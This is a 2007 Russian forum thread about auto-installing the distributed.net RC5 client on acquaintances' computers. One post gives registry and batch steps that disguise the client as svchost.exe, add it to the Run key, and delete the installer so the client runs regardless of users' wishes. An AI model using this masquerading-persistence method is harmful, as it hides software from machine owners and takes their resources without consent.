Легенда:
   новое сообщение
    закрытая нитка
    новое сообщение
    в закрытой нитке
    старое сообщение

| 
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
 - Новичкам также крайне полезно ознакомиться с данным документом.

|   |   |   | 
А что именно не получилось?  25.12.07 09:30  Число просмотров: 2902
 Автор: Алекс <Алексей aka cosmo_vk> Статус: Member Отредактировано 25.12.07 09:46  Количество правок: 3
 | 

> у меня все намного проще! не обязательно прятать! > с архивом сфх чето не получилось... была раньше програмка > автоинсталяции. так вот что то она щас не работет на висте > и кажетсья ХР. у меня некоторые люди просто не шарят как > ставить вообще в автозагрузку итд. а живут в разных > городах!  > я сам тоже не хакер чтоб создавать слижком сложные схемы > установки:) А что именно не получилось? 
 Если как прописать клиента, то делается так: 
 само собой создаем SFX-архив, после это заходим в параметры SFX на вкладке дополнительно, в поле "Путь для распаковки", указываем, например, C:\Program Files\DNet\. Затем в поле "Выполнить после распаковки" указываем это dnetc.exe -install. Перезагружаемся и зрим нашего запущенного клиента.
 Главное настроить файл ini предварительно и добавить его в архив.
 | 

| 
<dnet>
 |  

[RC5] сори за повтор, но дайте ссылку!  02.12.07 14:00  
 Автор: maestro_sochi <maestro> Статус: Member
 | 

нужна програмка автоинсталятор (коров) а то некоторые знакомые мои готовы поставить е на комп но не могут даже в автозагрузку запихнуть корову:))) (не блондинка))))
 и чтоб работало и в висте!
 | 

| 
насчет ссылки хз... можно SFX в винраре сделать с запуском...  02.12.07 18:41  
 Автор: i1 Статус: Незарегистрированный пользователь
 | 

> нужна програмка автоинсталятор (коров) а то некоторые > знакомые мои готовы поставить е на комп но не могут даже в > автозагрузку запихнуть корову:))) (не блондинка)))) > и чтоб работало и в висте! 
 насчет ссылки хз... можно SFX в винраре сделать с запуском после распаковки dnetc -install...
 | 

|   | 
Автозапуск клиента  22.12.07 10:35  
 Автор: Алекс <Алексей aka cosmo_vk> Статус: Member Отредактировано 22.12.07 10:38  Количество правок: 1
 | 

Еще один способ маскировки заключается в прописывании клиента в автозапуск через реестр.
 Суть такова:
 Берется блокнот в нем пишутся такие строки:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
 "Svchost"="C:\\Program Files\\Windows NT\\dnet\\svchost.exe"

, где самый первый "Svchost" - это название параметра в реестре, а второй - его значение, указывающие где стоит наш клиент и 
 соотвественно название самого клиента.

Сохраняем сие творение с расширением .reg

Затем создаем новый документ с таким содержанием:

C:\WINDOWS\system32\reg import startup.reg
 copy "C:\Program Files\Windows NT\dnet\svchost.ini" "C:\Program Files\Windows NT\"
 del C:\WINDOWS\system32\startup.reg
 del firstrun.cmd

и сохраняем его как firstrun.cmd 
 Поясню, что делается в нем:
 1 строка импортирует настройки из нашего скопированного файла startup.reg в реестр
 2 строка копирует любой файл из папки где стоит клиент(можно что угодно копировать) в другую, чтоб удостовериться что cmd-к,
  отработал, а не просто его удалили.
 3 строкой удаляем файл с параметрами реестра
 ну и 4-й соответсвенно файл, из которого все это выполнялось.

файл firstrun.cmd соответсвенно помещаем в автозагруз пользователю(лучше всего это в AllUsers, чтоб наверняка), 
 а файл startup.reg в C:\WINDOWS\system32\
 Ждем загрузки компа с клиентом, командный файл отрабатывает и на следующий день наш клиент загружается 
 без всяких проблем вне зависимости от хотения юзеров на этой машине. 
 Отличие от команды -install в клиенте в том, что в реестр многие боятся лазить(даже анализируя через msconfig), 
 а вот в службы могут спокойно залезть и увидеть нашего клиента, т.к. он так и называется там. 
 Плюс выбор маскировки пал на svchost.exe так как под ним запускается все что угодно, 
 а вот под другими всего 1, максимум два процесса(winlogon.exe, lsass.exe). Но есть один минус у svchost - 
 его можно рубануть через TaskManager, т.к. он не входит в список критических процессов.

Не забываем про конфиг  "невидимости" клиента. :)
 | 

|   |   | 
[RC5] Автозапуск клиента  24.12.07 19:50  
 Автор: maestro_sochi <maestro> Статус: Member
 | 

у меня все намного проще! не обязательно прятать!
 с архивом сфх чето не получилось... была раньше програмка автоинсталяции. так вот что то она щас не работет на висте и кажетсья ХР. у меня некоторые люди просто не шарят как ставить вообще в автозагрузку итд. а живут в разных городах! 
 я сам тоже не хакер чтоб создавать слижком сложные схемы установки:)
 | 

|   |   |   | 
А что именно не получилось?  25.12.07 09:30  
 Автор: Алекс <Алексей aka cosmo_vk> Статус: Member Отредактировано 25.12.07 09:46  Количество правок: 3
 | 

> у меня все намного проще! не обязательно прятать! > с архивом сфх чето не получилось... была раньше програмка > автоинсталяции. так вот что то она щас не работет на висте > и кажетсья ХР. у меня некоторые люди просто не шарят как > ставить вообще в автозагрузку итд. а живут в разных > городах!  > я сам тоже не хакер чтоб создавать слижком сложные схемы > установки:) А что именно не получилось? 
 Если как прописать клиента, то делается так: 
 само собой создаем SFX-архив, после это заходим в параметры SFX на вкладке дополнительно, в поле "Путь для распаковки", указываем, например, C:\Program Files\DNet\. Затем в поле "Выполнить после распаковки" указываем это dnetc.exe -install. Перезагружаемся и зрим нашего запущенного клиента.
 Главное настроить файл ini предварительно и добавить его в архив.
 | 

|   |   |   |   | 
еще чтоб не перезагружаться можно батник написать и после...  28.12.07 17:10  
 Автор: i1 Статус: Незарегистрированный пользователь
 | 

> > у меня все намного проще! не обязательно прятать! > > с архивом сфх чето не получилось... была раньше > програмка > > автоинсталяции. так вот что то она щас не работет на > висте > > и кажетсья ХР. у меня некоторые люди просто не шарят > как > > ставить вообще в автозагрузку итд. а живут в разных > > городах!  > > я сам тоже не хакер чтоб создавать слижком сложные > схемы > > установки:) > А что именно не получилось?  > Если как прописать клиента, то делается так:  > само собой создаем SFX-архив, после это заходим в параметры > SFX на вкладке дополнительно, в поле "Путь для распаковки", > указываем, например, C:\Program Files\DNet\. Затем в поле > "Выполнить после распаковки" указываем это dnetc.exe > -install. Перезагружаемся и зрим нашего запущенного > клиента. > Главное настроить файл ini предварительно и добавить его в > архив. 
 еще чтоб не перезагружаться можно батник написать и после распаковки запускать его

dnetc -install
 net start dnetc (ну или dnetc -svcstart)
 | 

| 
 |